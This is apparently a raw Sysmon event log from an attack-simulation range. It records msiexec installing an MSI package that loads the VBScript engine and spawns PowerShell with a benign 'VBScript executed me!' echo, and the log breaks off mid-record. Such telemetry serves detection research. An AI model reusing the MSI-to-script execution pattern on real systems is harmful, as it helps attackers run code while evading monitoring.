12241200x80000000000000002697560Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002697559Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 23542300x80000000000000002697558Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.037{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5148.msiMD5=AEA42482EBB78BD94F063AD4ED15E428,SHA256=8561D6CEEDEB83C16F3A23CC62E6CDB924B2157D10880A90E5F211B760BF4988falsetrue 10341000x80000000000000002697177Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.772{7CF983DC-9827-62AC-416B-000000006202}24243576C:\Windows\System32\MsiExec.exe{7CF983DC-9827-62AC-426B-000000006202}864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002697176Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.773{7CF983DC-9827-62AC-426B-000000006202}864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host VBScript executed me!; exitC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 5625188F216DB3876EA773B268668ECDWIN-HOST-MHAAG-\Administrator 13241300x80000000000000002697175Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002697174Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002697173Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002697172Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 10341000x80000000000000002697171Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.756{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002697170Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.756{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697169Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002697168Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697167Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1ECtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697166Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697165Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\iertutil.dll11.00.14393.5006 (rs1_release.220301-1704)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=153A3C6C45E23363BC842795FD49E7A3,SHA256=06DFA7248890579938106FF7527BB8FD0091A24D1C1667CB6583A4D239885141trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697164Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\urlmon.dll11.00.14393.5006 (rs1_release.220301-1704)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=72DA72C24A0AD3C49AC956DC083EEDF3,SHA256=2DB817631EC24840FDED7C584BC08F03D3549D93552C8E20005E18BA5E81CA12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697163Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\edputil.dll10.0.14393.2608 (rs1_release.181024-1742)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=75AC86B00CE4C64B02B105A55CA35628,SHA256=DB31A2345E3BB8DC79BFB4CC29615E3B8B7638AE80BFEC45FA57852669A592AEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002697162Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManagerWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002697161Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002697160Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697159Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.756{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=087C47C19BBFCB9F4932C03C0189E86B,SHA256=9BEE35FBFA2E595372D82E8858BE46CE7717E0399996960398BC238F4D0E5207trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697158Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697157Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\sxs.dll10.0.14393.4169 (rs1_release.210107-1130)Fusion 2.5Microsoft® Windows® Operating SystemMicrosoft CorporationSXS.DLLMD5=54FB18CA661D074CBB60D5A58D40C8D3,SHA256=A2BD6160222A216F8A6830C1273662F8AE88F53D2CE6DA5893FF70D146A0A2B0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697156Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697155Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\scrrun.dll5.812.10240.16384Microsoft ® Script RuntimeMicrosoft ® Script RuntimeMicrosoft Corporationscrrun.dllMD5=6E948305B041BE52E45E9E942C78A3F4,SHA256=93C4A201E3627E617C478054BAB472553CF48B84C32DE2F0A316F30F4A61A782trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697154Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\mpr.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Multiple Provider Router DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmpr.dllMD5=0E56DB60C434D51769F2DAC48B9AA686,SHA256=3F9AED98B1B7F6A59C219F622FD91C7FD20BFE280935F5334920A02ECCAE7ED6trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697153Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\wshom.ocx5.812.10240.16384Windows Script Host Runtime LibraryMicrosoft ® Windows Script Host Runtime LibraryMicrosoft Corporationwshom.ocxMD5=012C02BB5DD8EC0FD4AC2688D8D4D0CF,SHA256=B73B3C361F6B07960B092485CE8C96A4E68F741D718C6E847FF37C5BA5227C18trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002697152Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-EE56-62A8-1500-000000006202}10482344C:\Windows\system32\svchost.exe{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002697151Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697150Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002697149Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows Script\SettingsWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697148Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697147Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\vbscript.dll5.812.10240.16384Microsoft ® VBScriptMicrosoft ® VBScriptMicrosoft Corporationvbscript.dllMD5=B9598FFF335D808F6E4B3B19F0E1E0F3,SHA256=79B0FF39BC2E399748CE6FD8683A7B635B7D245B71F9063C2A93D3100B4F97D6trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697146Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697145Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002697144Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424136C:\Windows\System32\MsiExec.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\MsiExec.exe+6bca|C:\Windows\System32\MsiExec.exe+7166|C:\Windows\System32\MsiExec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000002697143Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697142Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697141Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697140Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697139Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697138Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697137Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.741{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697136Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002697135Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697134Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697133Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft 